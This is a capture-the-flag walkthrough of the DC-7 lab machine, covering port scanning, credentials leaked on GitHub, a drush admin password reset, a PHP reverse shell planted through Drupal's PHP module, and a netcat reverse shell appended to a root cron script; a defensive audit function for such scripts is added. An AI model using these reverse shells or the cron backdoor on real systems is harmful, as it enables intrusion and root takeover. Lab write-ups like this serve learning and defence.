Contents
Preparation
Attack machine: Kali, Windows 11
Target: DC-7 (network set to NAT mode)
I. Penetration test
1. IP address discovery
┌──(root㉿kali)-[~]
└─# arp-scan -l
By comparing MAC addresses, the target's IP address is 192.168.105.167.
2. Port enumeration
┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.105.167
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-14 19:09 CST
Nmap scan report for 192.168.105.167 (192.168.105.167)
Host is up (0.00066s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open http Apache httpd 2.4.25 ((Debian))
An HTTP service and an SSH service are found, and both are open.
3. Web information gathering
Visit port 80

DC-7 introduces some "new" concepts, but I'll leave you to figure out what they are. :-)
While this challenge isn't all that technical, if you want to resort to brute forcing or dictionary attacks, you probably won't succeed.
What you will have to do is think outside the box.
Waaaay outside the box. :-)
This is practically a flag in itself: it hints that brute force won't work, and that following the usual approach it will be very hard to get an account or password.
Wappalyzer

A familiar CMS shows up: Drupal, version 8. While probing, I also ran dirsearch over the directories... apart from the login form it found basically nothing.
At this point I really had no idea what the "new" method was, so I read other people's writeups and found that it uses social-engineering information gathering (OSINT).
OSINT gathering

Using this piece of information to dig up details about the user, I successfully found the related material on GitHub.


At this point one could audit the code for vulnerable functionality, or go straight for information that is hidden in it. Looking through it, a user's credentials turn up in config.php:

Account: dc7user Password: MdR3xOgB7#dW

??? Can't log in on the web page? But SSH login works (perhaps this user is disabled for web login? Something to figure out later.)
┌──(root㉿kali)-[~]
└─# ssh dc7user@192.168.105.167
The authenticity of host '192.168.105.167 (192.168.105.167)' can't be established.
ED25519 key fingerprint is SHA256:BDWqBUcitB8KKGYDyoeZkt2C/aXhZ7gi5xSEtOSB+Rk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.105.167' (ED25519) to the list of known hosts.
dc7user@192.168.105.167's password:
Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Fri Aug 30 03:10:09 2019 from 192.168.0.100
dc7user@dc-7:~$
Look closely: the banner says there is new mail, but first let's look at the home directory.
dc7user@dc-7:~$ ls
backups mbox
dc7user@dc-7:~/backups$ ls
website.sql.gpg website.tar.gz.gpg
**GPG (GNU Privacy Guard)** is a tool for encrypting, signing and verifying data; .gpg files are normally the product of GPG encryption or signing operations.
Now let's look at the mail.
dc7user@dc-7:~$ mail
"/var/mail/dc7user": 5 messages 5 new
>N 1 Cron Daemon Fri Feb 14 21:19 22/800 Cron <root@dc-7> /opt/sc
N 2 Cron Daemon Fri Feb 14 21:35 21/729 Cron <root@dc-7> /opt/sc
N 3 Cron Daemon Fri Feb 14 21:46 21/729 Cron <root@dc-7> /opt/sc
N 4 Cron Daemon Fri Feb 14 22:01 21/729 Cron <root@dc-7> /opt/sc
N 5 Cron Daemon Fri Feb 14 22:16 21/729 Cron <root@dc-7> /opt/sc
?
The mail listing gives the path; let's see what the mails contain.
dc7user@dc-7:~$ cat /var/mail/dc7user
From root@dc-7 Fri Feb 14 21:19:40 2025
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 14 Feb 2025 21:19:40 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1titjM-0000X7-QJ
for root@dc-7; Fri, 14 Feb 2025 21:19:37 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1titjM-0000X7-QJ@dc-7>
Date: Fri, 14 Feb 2025 21:19:36 +1000
rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql [success]
Summary
These mails record the execution of the /opt/scripts/backups.sh script. Its main job is a database backup, saved to /home/dc7user/backups/website.sql. During execution the script appears to try to empty the backup directory first, which did not yet exist on the first run (hence the rm error in the first mail). From the timestamps, the script runs periodically; the exact schedule can be determined from /etc/crontab or from root's crontab file.
Two files matter here:
/opt/scripts/backups.sh
/home/dc7user/backups/website.sql
Let's look at the backups.sh file.
dc7user@dc-7:~$ ls -l /opt/scripts/backups.sh
-rwxrwxr-x 1 root www-data 520 Aug 29 2019 /opt/scripts/backups.sh
This shows that only the root user and members of the www-data group have write permission; everyone else has only read and execute.
dc7user@dc-7:~$ cat /opt/scripts/backups.sh
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz
You have new mail in /var/mail/dc7user
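The listing and script above show the two root-cause misconfigurations on this box: a script that root's cron executes is writable by the www-data group, and the GPG passphrase is passed on the command line where anyone who can read the script (or watch the process list) can see it. The following audit function is an added example written for this page, not part of the original writeup or of DC-7; it assumes GNU coreutils `stat` (as on Debian) and takes an optional second argument naming the account whose crontab runs the script (default root).

```bash
#!/usr/bin/env bash
# Added example: audit a script that a cron job runs with another user's
# privileges. Flags (1) ownership by someone other than the runner,
# (2) group- or world-writable mode, (3) a passphrase passed as an argument,
# which is exactly the situation of /opt/scripts/backups.sh above.
# Usage: audit_cron_script /path/to/script [runner-user]
# Prints one FINDING per line; returns 0 when clean, 1 on findings, 2 on error.
audit_cron_script() {
    local script="$1" runner="${2:-root}"
    local findings=0 mode owner group
    # GNU stat (Debian/Kali); %a = octal mode, %U/%G = owner/group names
    mode=$(stat -c '%a' "$script" 2>/dev/null) || return 2
    owner=$(stat -c '%U' "$script")
    group=$(stat -c '%G' "$script")
    # Last two octal digits are the group and other permission bits
    local g=${mode: -2:1} o=${mode: -1}

    if [ "$owner" != "$runner" ]; then
        echo "FINDING: $script is owned by $owner, but $runner executes it"
        findings=1
    fi
    # bit 2 = write; group-writable is only acceptable for the runner's own group
    if [ $((g & 2)) -ne 0 ] && [ "$group" != "$runner" ]; then
        echo "FINDING: $script is writable by group $group (mode $mode)"
        findings=1
    fi
    if [ $((o & 2)) -ne 0 ]; then
        echo "FINDING: $script is world-writable (mode $mode)"
        findings=1
    fi
    # Secrets on the command line, e.g. gpg --passphrase PickYourOwnPassword
    if grep -Eq -- '--passphrase[ =]' "$script"; then
        echo "FINDING: $script passes a passphrase on the command line"
        findings=1
    fi
    return "$findings"
}

# Stand-alone use: audit the DC-7 script when run on that box
[ "${BASH_SOURCE[0]}" = "$0" ] && audit_cron_script /opt/scripts/backups.sh
```

Run against the listing above it would report the www-data group write access and the embedded passphrase; the fix is mode 0755 owned by root:root and a passphrase read from a root-only file.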
Let's have AI analyze this for us. Two of the commands I had not seen before: drush and gpg. We already looked at gpg above, so what does drush do?
drush is the command-line tool for Drupal sites, used to administer and operate a Drupal installation.
Summing up what we know: backups.sh can be used for privilege escalation, but to make use of it (by writing a shell into it) we first need a www-data shell, and getting a www-data shell requires a web login... Looking at /home, there are no other users. Since drush is Drupal's command-line administration tool, let's see which of its commands could help; one stands out:
Changing an account password directly with Drush
dc7user@dc-7:~$ drush user-password admin --password="admin"
Command user-password needs a higher bootstrap level to run - you will need to invoke drush from a more functional Drupal environment to [error]
run this command.
The drush command 'user-password admin' could not be executed.
This can change the admin account's password directly, but it does not work from this directory; the web root is normally /var/www/html.
dc7user@dc-7:/var/www/html$ drush user-password admin --password="admin"
Changed password for admin
Password changed successfully! Log in on the web page.

Now we need to get a shell out of the web page. Remember this page?

It was already there at login; this should be file inclusion. If a reverse shell could be added here, and the file is then parsed by the server when it is included later, we might get a shell.
<?php
system("bash -c 'bash -i >& /dev/tcp/192.168.105.148/5555 0>&1'");

It shows that the content can only be saved as HTML; let's see whether there is a module that interprets PHP.
Downloading the PHP module

Visit the site AI suggested and search for PHP.

Scroll down

Click download. Once it has finished, go back to the target's web page and open the modules page.


Then import the file just downloaded. Here, however, the import failed with a temporary error. Looking at the URL field above it, entering the URL directly should also work, so copy the download link of that file.

Still a download error... the only option left was to use the URL from another writeup:
https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
This URL downloads successfully.

Then scroll down and tick this option.


Reverse shell
Good. Now let's see whether it is interpreted as PHP: click edit on the article from before.

Switch the text format to PHP code, save, and revisit the site. Still no shell back; let's look at the article once more.

It shows the code was escaped. Perhaps there was too much unrelated content in front of it? Add only this one line.

This time the reverse shell connects back.
┌──(root㉿kali)-[~]
└─# nc -lvp 5555
listening on [any] 5555 ...
connect to [192.168.105.148] from 192.168.105.167 [192.168.105.167] 42202
bash: cannot set terminal process group (556): Inappropriate ioctl for device
bash: no job control in this shell
www-data@dc-7:/var/www/html$
OK, recall what we worked out earlier: we need root or www-data to run backups.sh in order to escalate. The mails showed that root runs backups.sh on a schedule, so if backups.sh contains a reverse shell, we get a root shell automatically at the next run.
www-data@dc-7:/opt/scripts$ echo "nc -e /bin/bash 192.168.105.148 5556" >> backups.sh
Then it is just a matter of waiting to get a root shell, although my shell only stayed alive for a short while; I don't know why.
II. Summary
This box exposed me to a lot of "different" ways of thinking. Looking back, they include: **OSINT gathering, learning about the command-line tools that ship with some websites, and downloading a module to get the functionality I needed.** These ideas were all fairly new to me, and I also relied on many other people's writeups (because I really didn't know how --_--|), having no clue how to proceed. While attacking the box I probably would not have paid attention to the Drush command-line tool (I might have asked AI to explain it, but I would not have thought of making use of it). As for modules: right after logging in, the first thing I thought of was finding a module vulnerability, but there were no modules... Fundamentally I was reluctant to go looking through the site for functionality where vulnerabilities might appear. In fact, "on the surface" this site does not show any vulnerability; it only becomes exploitable once you think "if only this write function could be interpreted as PHP". I hope I can be more patient and methodical in future.
